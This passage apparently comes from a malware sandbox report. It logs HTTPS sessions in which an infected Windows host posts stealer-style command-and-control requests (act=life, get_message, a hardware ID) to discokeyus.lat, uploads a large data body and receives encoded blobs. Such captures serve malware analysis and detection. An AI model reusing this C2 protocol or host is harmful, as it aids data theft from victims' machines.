                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 5b 5a 46 99 dd 15 d1 3b 73 14 a9 7e e7 e0 07 33 05 91 65 21 8d b1 d2 f6 64 3c 66 31 f9 0b d6 18 66 ef 4a 85 0b da 84 9b 71 45 96 75 c6 51 e6 ce 62 cf 7f 3d 89 12 e1 5f 07 f6 13 22 bb f0 47 27 b6 74 e6 1e 5a e3 04 49 31 32 a1 84 d8 98 f0 46 a3 88 ee cc 21 7f 48 36 77 6d 13 5e 91 24 e8 b7 9a 7d f7 de 1b f9 23 0a 3c 85 e0 ff d7 fc 21 f1 31 7e 9e 08 ca 47 51 b7 1d df 3e 89 c7 df 97 3c a9 19 f5 47 e0 e1 f9 21 93 de 3e b5 f7 13 d3 e9 93 23 31 da 0f 3a 47 99 94 f8 d7 f0 4d b4 6f ea 40 6b eb 84 15 1e 5e 42 89 8c 89 86 d9 6d 95 ec df b3 b7 5f 6a 8f 44 f6 c2 52 e2 d9 d1 86 d5 74 0d 3f 13 6b 4a 1e 1a c8 3d 15 07 f6 1e b5 0f a8 e4 00 71 70 23 ea e6 ea 49 ec d1 69 b9 4d ea 50 57 ad 02 66 9b 10 8e b2 b0 79 7d b5 f4 00 ee a3 35 de 5e 34 24 c8 16 07 f7 cc 82 12 df 20 38
                                                                                                                                                                                                                                                                          Data Ascii: [ZF;s~3e!d<f1fJqEuQb=_"G'tZI12F!H6wm^$}#<!1~GQ><G!>#1:GMo@k^Bm_jDRt?kJ=qp#IiMPWfy}5^4$ 8
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 55 5b 01 e1 f2 6c be 33 6c 45 03 a3 09 3a 1d 75 2c 32 a0 16 33 8c 02 a9 b6 f1 74 32 27 93 67 2a 8a 69 3a ae 22 b5 b9 a8 b0 15 be fb 79 ed 8c 8b ea fc 67 ae ef 0e 0b f3 46 aa 30 64 ee 1a d1 b2 a6 37 b2 3b b5 8b 25 d1 3a f2 0c 4e d9 15 b4 2e 29 d6 2b c7 58 c9 44 5e c3 d0 33 a3 cc fb a5 25 ae 0f d4 59 a2 f0 6d c6 60 4a 04 3e 5b 7a fc 7c 91 5d 99 84 ef d1 1f f4 2a cf d0 84 bb 90 99 16 fa 29 b9 13 92 0b 2f 97 ed 16 20 73 d3 61 6e aa 14 b5 d6 1f 26 8b af e0 a2 fa 7b 5b 84 dc 6b 9a 99 2b 61 31 77 f6 8f 3c bb b3 0e 85 f7 a6 e1 07 a2 a6 27 73 3d 7c fb 69 56 13 58 f5 cc 79 ad d9 8e af 25 8d 71 e5 71 0b f0 1d 3b 80 a0 fa 64 20 f2 95 98 7c 9d 4c 8d c5 93 8f ce d7 aa 8d ed 04 17 be 21 35 68 80 62 1a 1d 64 aa a7 a4 72 98 78 95 42 2e df 46 2a 0a 6e 67 12 d8 ee 13 e6 6b
                                                                                                                                                                                                                                                                          Data Ascii: U[l3lE:u,23t2'g*i:"ygF0d7;%:N.)+XD^3%Ym`J>[z|]*)/ san&{[k+a1w<'s=|iVXy%qq;d |L!5hbdrxB.F*ngk
                                                                                                                                                                                                                                                                          2024-12-21 00:16:08 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=7hqo7hhjopl6tofj62bu85onpe; expires=Tue, 15 Apr 2025 18:02:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCcsA5hftpz4GPpGZKV9aXns97kkeM%2FlpAQIRN1WOdt3mFMFSbktvgjjBWh3%2B7JM1bnjiRcw6LOmikNo7CVYWq%2BW4ReF2MjggZDz9yZxusqOBjQqYgpxkBtLr1jl8JFoqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae746e6c4228-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1701&rtt_var=657&sent=303&recv=571&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552989&delivery_rate=1640449&cwnd=209&unsent_bytes=0&cid=76431a6c7a32ce3f&ts=2536&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          43192.168.2.550170172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:06 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:16:07 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=md52li69qcr52eqm4204cm9dj2; expires=Tue, 15 Apr 2025 18:02:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jmBvObxJiK82sysb8rkkCz%2BwPgtzpQ2jl7FMMAG3l1epNgD%2FYD2qEzyub1isXCyjMZ3tXtplj6Qn6aRjyUp0cHXs6dz2XTx5GaSo%2BVU6UB1w5YisGggQDZ8c5SLvejf2sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae7bff9d43ed-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1757&rtt_var=659&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1661923&cwnd=205&unsent_bytes=0&cid=a55c953508ae0c97&ts=778&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:16:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          44192.168.2.550178172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=dckpi7q8u2513vejeu510hmudu; expires=Tue, 15 Apr 2025 18:02:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B35VUG%2FqKgSmu11%2FufEtLQhN5qK8WhnBp2SY06jSrMYTgj0aXQG86wmDeujptpt%2FDFvvwvxbzSHELzGyGeYczE5sxtWGXYScTirhncvWj1UiIox2EiNMg0Cmo0IjaMF59w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae8a7b934388-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1723&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1694718&cwnd=221&unsent_bytes=0&cid=7e4e767d99db4fa3&ts=803&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC244INData Raw: 34 36 63 0d 0a 41 33 42 71 6c 67 51 4c 7a 68 43 43 39 4d 69 5a 58 41 33 6b 44 48 64 65 76 79 63 56 30 49 51 38 6a 72 42 72 62 57 48 4a 72 78 31 34 55 68 79 30 50 6a 2f 69 4d 76 47 52 36 71 4d 6f 66 35 46 70 57 33 7a 65 51 7a 66 71 34 6c 33 69 77 77 35 42 51 37 2f 43 50 7a 6b 57 43 2f 70 33 62 75 49 79 35 34 7a 71 6f 77 64 32 78 6d 6b 5a 66 49 55 46 63 4c 72 6d 58 65 4c 53 43 67 59 4f 75 63 4e 2b 61 78 77 4e 2f 6d 46 6f 71 6e 48 75 6d 61 33 38 4f 57 79 4f 59 68 34 7a 31 30 6f 33 2f 4b 5a 5a 39 4a 4a 52 54 79 79 73 32 33 78 4f 45 52 6e 39 4a 6e 62 69 61 36 43 52 70 72 74 6d 4c 34 56 70 46 54 4c 5a 51 33 36 34 37 46 54 71 30 77 38 48 45 61 44 4a 64 57 73 53 44 76 39 72 59 62 35 38 35 4a 36 6d 2b 6a 4e 73 78 69 42 56 4f 38 55
                                                                                                                                                                                                                                                                          Data Ascii: 46cA3BqlgQLzhCC9MiZXA3kDHdevycV0IQ8jrBrbWHJrx14Uhy0Pj/iMvGR6qMof5FpW3zeQzfq4l3iww5BQ7/CPzkWC/p3buIy54zqowd2xmkZfIUFcLrmXeLSCgYOucN+axwN/mFoqnHuma38OWyOYh4z10o3/KZZ9JJRTyys23xOERn9Jnbia6CRprtmL4VpFTLZQ3647FTq0w8HEaDJdWsSDv9rYb585J6m+jNsxiBVO8U
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC895INData Raw: 46 4c 2f 4b 31 62 4f 2f 44 47 42 6f 4f 75 38 73 2f 66 6c 77 52 74 47 46 6c 37 43 71 67 6e 71 62 31 4f 32 79 4a 61 52 51 38 7a 30 70 33 73 65 35 57 36 4e 67 47 41 41 79 6c 78 33 68 70 47 77 2f 37 59 57 47 71 66 65 50 57 35 4c 73 35 64 38 59 32 56 52 7a 4e 52 6e 53 6d 36 30 2b 73 7a 55 63 57 51 36 7a 42 50 7a 6c 53 44 76 70 6e 5a 4b 78 67 36 4a 32 68 2f 69 78 6b 6a 32 4d 59 50 4e 42 50 65 4c 48 6d 57 65 62 59 42 67 55 48 70 73 42 35 59 52 4a 49 75 69 5a 75 74 44 4b 34 31 6f 6e 2b 4c 6d 69 4b 65 46 63 47 6e 56 6f 35 71 36 5a 5a 34 4a 4a 52 54 77 75 75 7a 6e 78 71 48 51 76 38 62 58 75 73 59 4f 61 62 72 2b 6b 34 61 6f 68 6b 46 69 37 58 53 33 47 78 37 31 58 6c 31 77 34 4c 51 2b 57 4e 65 48 6c 53 55 4c 52 48 5a 4b 64 2b 36 6f 47 71 75 79 45 68 6e 79 34 53 4d 4a
                                                                                                                                                                                                                                                                          Data Ascii: FL/K1bO/DGBoOu8s/flwRtGFl7Cqgnqb1O2yJaRQ8z0p3se5W6NgGAAylx3hpGw/7YWGqfePW5Ls5d8Y2VRzNRnSm60+szUcWQ6zBPzlSDvpnZKxg6J2h/ixkj2MYPNBPeLHmWebYBgUHpsB5YRJIuiZutDK41on+LmiKeFcGnVo5q6ZZ4JJRTwuuznxqHQv8bXusYOabr+k4aohkFi7XS3Gx71Xl1w4LQ+WNeHlSULRHZKd+6oGquyEhny4SMJ
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 34 34 62 30 0d 0a 4d 74 70 54 4e 36 32 6f 52 36 7a 56 42 55 39 62 36 38 4a 77 62 68 6f 49 39 57 4a 6b 71 48 50 74 6d 71 50 34 4d 6d 4f 4f 59 78 6b 34 30 6b 31 2f 73 65 35 4d 34 74 77 50 43 51 4f 75 6a 54 45 68 46 52 43 30 50 69 6d 49 66 50 65 43 6f 62 6b 4c 62 49 68 67 45 69 71 64 57 6a 6d 72 70 6c 6e 67 6b 6c 46 50 44 61 62 47 63 32 59 62 43 66 64 6d 59 36 4a 39 36 70 36 69 2b 7a 4e 75 6a 57 59 54 4d 64 5a 4b 65 4c 58 75 58 65 44 58 42 41 78 44 35 59 31 34 65 56 4a 51 74 45 4e 6e 72 32 50 78 31 4a 2f 34 4d 47 47 42 65 46 55 6a 6b 31 77 33 74 65 6f 65 74 4a 49 44 43 41 53 76 77 48 56 69 46 67 7a 35 61 57 43 6c 65 2f 4b 63 70 76 55 73 59 6f 78 72 47 7a 44 59 53 6e 65 7a 35 31 44 6d 32 55 6c 42 51 36 7a 56 50 7a 6c 53 4a 2f 6c 32 65 36 5a 35 38 64 53 66 2b
                                                                                                                                                                                                                                                                          Data Ascii: 44b0MtpTN62oR6zVBU9b68JwbhoI9WJkqHPtmqP4MmOOYxk40k1/se5M4twPCQOujTEhFRC0PimIfPeCobkLbIhgEiqdWjmrplngklFPDabGc2YbCfdmY6J96p6i+zNujWYTMdZKeLXuXeDXBAxD5Y14eVJQtENnr2Px1J/4MGGBeFUjk1w3teoetJIDCASvwHViFgz5aWCle/KcpvUsYoxrGzDYSnez51Dm2UlBQ6zVPzlSJ/l2e6Z58dSf+
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 32 56 52 50 65 55 33 33 79 2b 52 44 31 6b 67 34 44 51 2f 4f 4e 64 57 30 57 43 2f 68 76 5a 61 46 7a 35 4a 47 6e 2f 7a 35 70 67 47 73 55 4e 39 56 4a 65 4c 6a 71 57 75 44 62 44 77 4d 41 71 4d 73 2f 4c 31 49 50 37 43 59 78 37 46 50 74 6e 61 62 37 50 58 36 42 4c 6c 74 38 30 30 4e 33 38 72 35 49 2f 4d 55 4f 45 45 32 79 6a 58 68 74 55 6c 43 30 62 48 75 70 66 4f 53 63 72 2f 38 79 5a 59 5a 72 42 7a 54 62 51 6e 75 36 34 31 48 71 31 77 51 49 43 4b 6a 66 62 57 49 57 42 76 67 6d 4a 2b 78 31 2b 4e 62 79 75 78 74 34 68 58 34 54 50 35 31 61 4f 61 75 6d 57 65 43 53 55 55 38 44 70 63 46 30 5a 68 6b 44 38 47 4a 70 6f 58 6e 75 6d 4b 50 33 4e 6d 4f 42 66 42 67 35 31 55 39 2b 74 2b 70 54 37 38 41 4b 44 6b 50 6c 6a 58 68 35 55 6c 43 30 51 56 71 62 55 61 43 4a 35 4f 4a 2b 61 49
                                                                                                                                                                                                                                                                          Data Ascii: 2VRPeU33y+RD1kg4DQ/ONdW0WC/hvZaFz5JGn/z5pgGsUN9VJeLjqWuDbDwMAqMs/L1IP7CYx7FPtnab7PX6BLlt800N38r5I/MUOEE2yjXhtUlC0bHupfOScr/8yZYZrBzTbQnu641Hq1wQICKjfbWIWBvgmJ+x1+Nbyuxt4hX4TP51aOaumWeCSUU8DpcF0ZhkD8GJpoXnumKP3NmOBfBg51U9+t+pT78AKDkPljXh5UlC0QVqbUaCJ5OJ+aI
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 38 55 5a 34 75 61 5a 42 6f 73 74 4a 43 41 2f 72 6c 54 39 6d 47 67 44 36 5a 57 2b 6e 66 75 79 58 6f 2f 30 37 5a 34 46 68 45 6a 58 61 52 58 47 67 34 56 50 6c 30 67 49 47 43 61 2f 4d 64 43 46 63 53 50 4e 2b 4b 66 51 79 30 70 47 38 36 7a 30 76 6d 53 41 4d 66 4e 70 4a 4e 2b 71 6d 55 2f 37 54 44 42 30 48 70 4d 5a 74 61 68 51 49 38 58 52 75 6f 48 6a 76 6c 61 4c 32 50 57 65 55 62 68 67 38 7a 31 64 78 75 65 67 65 6f 70 49 4f 46 30 50 7a 6a 55 35 32 47 55 6a 72 4b 48 44 73 64 65 7a 57 38 72 73 39 5a 59 74 67 42 7a 6a 62 54 6e 53 38 37 6c 76 6b 31 67 4d 43 44 4b 44 48 64 6d 6b 53 42 2f 46 75 59 71 70 38 34 5a 43 6d 39 6e 34 68 78 6d 6b 4e 66 49 55 46 55 4b 6a 72 57 50 76 44 50 41 67 44 2b 6f 31 67 4c 77 74 49 38 32 6f 70 39 44 4c 74 6d 71 44 32 4f 32 75 4f 61 52 59
                                                                                                                                                                                                                                                                          Data Ascii: 8UZ4uaZBostJCA/rlT9mGgD6ZW+nfuyXo/07Z4FhEjXaRXGg4VPl0gIGCa/MdCFcSPN+KfQy0pG86z0vmSAMfNpJN+qmU/7TDB0HpMZtahQI8XRuoHjvlaL2PWeUbhg8z1dxuegeopIOF0PzjU52GUjrKHDsdezW8rs9ZYtgBzjbTnS87lvk1gMCDKDHdmkSB/FuYqp84ZCm9n4hxmkNfIUFUKjrWPvDPAgD+o1gLwtI82op9DLtmqD2O2uOaRY
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 37 58 71 48 72 53 53 42 77 49 46 71 73 78 33 61 52 49 4f 2f 6d 4a 71 70 58 48 6e 6e 36 7a 77 50 57 57 4a 61 52 4d 34 33 55 35 77 76 4f 42 62 35 39 74 4a 51 55 4f 73 31 54 38 35 55 69 37 58 64 48 75 65 66 4f 4f 4e 36 75 52 77 64 73 5a 70 47 58 79 46 42 58 79 36 36 55 7a 70 32 77 45 4c 43 71 76 4a 64 57 77 56 43 50 46 72 62 4b 68 38 35 4a 47 71 39 7a 46 6f 6a 6d 45 52 50 4e 49 46 4f 66 4c 68 52 71 79 4b 53 53 38 49 76 65 78 78 61 67 42 49 36 79 68 77 37 48 58 73 31 76 4b 37 4d 47 61 48 5a 68 73 77 31 55 46 6c 73 75 31 58 34 39 4d 47 44 77 43 71 78 33 64 7a 46 41 6a 2f 62 6d 36 6b 64 75 36 45 71 2f 52 2b 49 63 5a 70 44 58 79 46 42 55 61 6b 34 56 6e 6a 6b 43 41 49 47 4b 72 48 66 47 6f 65 53 4f 73 6f 63 4f 78 31 37 4e 62 79 75 7a 4e 6a 69 32 6f 48 4d 4e 31 46
                                                                                                                                                                                                                                                                          Data Ascii: 7XqHrSSBwIFqsx3aRIO/mJqpXHnn6zwPWWJaRM43U5wvOBb59tJQUOs1T85Ui7XdHuefOON6uRwdsZpGXyFBXy66Uzp2wELCqvJdWwVCPFrbKh85JGq9zFojmERPNIFOfLhRqyKSS8IvexxagBI6yhw7HXs1vK7MGaHZhsw1UFlsu1X49MGDwCqx3dzFAj/bm6kdu6Eq/R+IcZpDXyFBUak4VnjkCAIGKrHfGoeSOsocOx17NbyuzNji2oHMN1F
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 37 6e 33 41 77 4f 44 36 48 4b 63 58 4d 54 41 76 68 6e 62 71 74 35 38 70 32 34 38 44 5a 73 69 47 59 63 50 4e 4e 46 64 72 2f 6d 48 71 4b 53 44 68 64 44 38 34 31 61 51 67 55 65 2f 69 52 4b 75 32 54 71 6b 61 62 74 4e 57 36 46 65 42 67 73 6e 51 73 33 6f 2b 46 50 72 49 6f 66 48 78 53 73 30 6a 46 34 55 67 2f 34 4a 6a 48 73 65 65 2b 59 70 2f 41 36 5a 6f 4e 6d 46 6a 6e 59 54 33 75 2b 35 31 62 6c 32 41 77 4b 42 61 48 4f 63 57 34 54 42 50 42 76 5a 36 55 79 72 74 61 74 34 33 34 33 78 6c 67 46 4f 38 56 49 5a 2f 44 55 58 66 33 44 48 41 49 54 72 59 39 51 59 68 34 4c 38 57 46 35 37 47 32 75 6a 2b 72 38 4d 69 2f 65 4c 68 55 34 30 55 5a 77 76 4f 6c 54 34 39 55 43 41 41 6d 6c 33 33 42 6b 47 67 54 38 61 33 75 6d 65 50 4b 66 6f 2f 59 77 5a 35 52 74 56 58 4b 64 51 6d 2f 79 76
                                                                                                                                                                                                                                                                          Data Ascii: 7n3AwOD6HKcXMTAvhnbqt58p248DZsiGYcPNNFdr/mHqKSDhdD841aQgUe/iRKu2TqkabtNW6FeBgsnQs3o+FPrIofHxSs0jF4Ug/4JjHsee+Yp/A6ZoNmFjnYT3u+51bl2AwKBaHOcW4TBPBvZ6Uyrtat4343xlgFO8VIZ/DUXf3DHAITrY9QYh4L8WF57G2uj+r8Mi/eLhU40UZwvOlT49UCAAml33BkGgT8a3umePKfo/YwZ5RtVXKdQm/yv
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 4c 50 68 57 6d 33 58 78 6b 46 54 62 4b 61 47 36 34 64 65 36 51 71 72 74 77 4c 34 6b 75 54 51 57 64 44 54 65 4e 71 42 37 30 6b 6c 46 50 4e 71 6a 44 63 57 59 45 47 62 6c 46 66 72 70 34 2b 39 53 4d 2f 43 39 6d 6b 47 4d 48 66 4a 4d 46 63 66 4b 2b 44 71 4b 53 44 52 35 44 38 35 30 74 4f 6b 64 62 6f 7a 59 37 73 7a 7a 35 31 72 79 37 5a 6a 33 49 4c 67 64 38 68 51 55 77 73 66 52 4d 36 74 45 66 44 45 53 56 38 31 39 71 42 41 6e 35 62 57 57 53 54 50 57 56 70 50 55 35 65 5a 63 75 57 33 7a 53 42 53 2b 4c 70 68 61 73 37 55 64 50 47 2b 75 56 50 31 51 52 42 76 70 68 66 37 30 2f 77 4a 32 38 2b 6a 4e 6b 69 69 77 55 4d 63 31 43 4e 2f 79 6d 57 4b 79 4b 57 55 46 44 72 39 77 2f 4f 55 4a 61 72 7a 4d 36 2b 79 4b 79 69 65 54 69 66 6e 6e 47 4e 6b 64 79 6e 56 63 33 36 71 59 5a 37 38
                                                                                                                                                                                                                                                                          Data Ascii: LPhWm3XxkFTbKaG64de6QqrtwL4kuTQWdDTeNqB70klFPNqjDcWYEGblFfrp4+9SM/C9mkGMHfJMFcfK+DqKSDR5D850tOkdbozY7szz51ry7Zj3ILgd8hQUwsfRM6tEfDESV819qBAn5bWWSTPWVpPU5eZcuW3zSBS+Lphas7UdPG+uVP1QRBvphf70/wJ28+jNkiiwUMc1CN/ymWKyKWUFDr9w/OUJarzM6+yKyieTifnnGNkdynVc36qYZ78
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC1369INData Raw: 75 73 35 2f 61 6c 4a 47 74 47 41 70 39 43 43 75 31 71 37 71 66 6a 66 57 50 45 35 70 6a 68 49 6e 34 50 6b 51 39 5a 49 66 54 31 76 35 67 7a 39 7a 55 6c 43 30 49 57 71 2b 59 4f 61 56 76 50 68 35 55 62 68 49 46 6a 76 62 52 6e 6d 6c 39 78 7a 44 30 51 49 44 44 36 7a 62 51 56 38 48 43 2f 70 6f 62 72 70 6a 6f 4e 6a 71 39 48 34 33 76 79 34 45 4e 74 6f 4a 50 2f 37 33 54 65 4c 5a 48 77 68 44 6c 49 4d 2f 65 56 4a 51 74 46 4e 71 6f 6e 7a 6e 67 4c 75 32 47 47 79 42 61 42 59 79 79 6c 51 33 2f 4b 5a 59 72 49 70 62 51 55 4f 76 33 44 38 35 51 6c 71 76 4d 7a 72 37 49 72 4b 4a 35 4f 4a 2b 65 63 59 32 52 6e 4b 64 56 7a 66 71 70 68 6e 69 33 77 67 4d 44 61 6a 66 62 57 63 52 48 76 63 68 56 35 4a 58 37 5a 75 76 39 54 6c 52 75 45 38 66 4c 4e 42 4b 63 49 7a 59 61 66 33 56 47 55 30
                                                                                                                                                                                                                                                                          Data Ascii: us5/alJGtGAp9CCu1q7qfjfWPE5pjhIn4PkQ9ZIfT1v5gz9zUlC0IWq+YOaVvPh5UbhIFjvbRnml9xzD0QIDD6zbQV8HC/pobrpjoNjq9H43vy4ENtoJP/73TeLZHwhDlIM/eVJQtFNqonzngLu2GGyBaBYyylQ3/KZYrIpbQUOv3D85QlqvMzr7IrKJ5OJ+ecY2RnKdVzfqphni3wgMDajfbWcRHvchV5JX7Zuv9TlRuE8fLNBKcIzYaf3VGU0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          45192.168.2.550180172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:09 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=80E12067200E3E98AC8923850305D13E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:10 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5k6vhviqb0djc4h9en4j2a90lb; expires=Tue, 15 Apr 2025 18:02:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
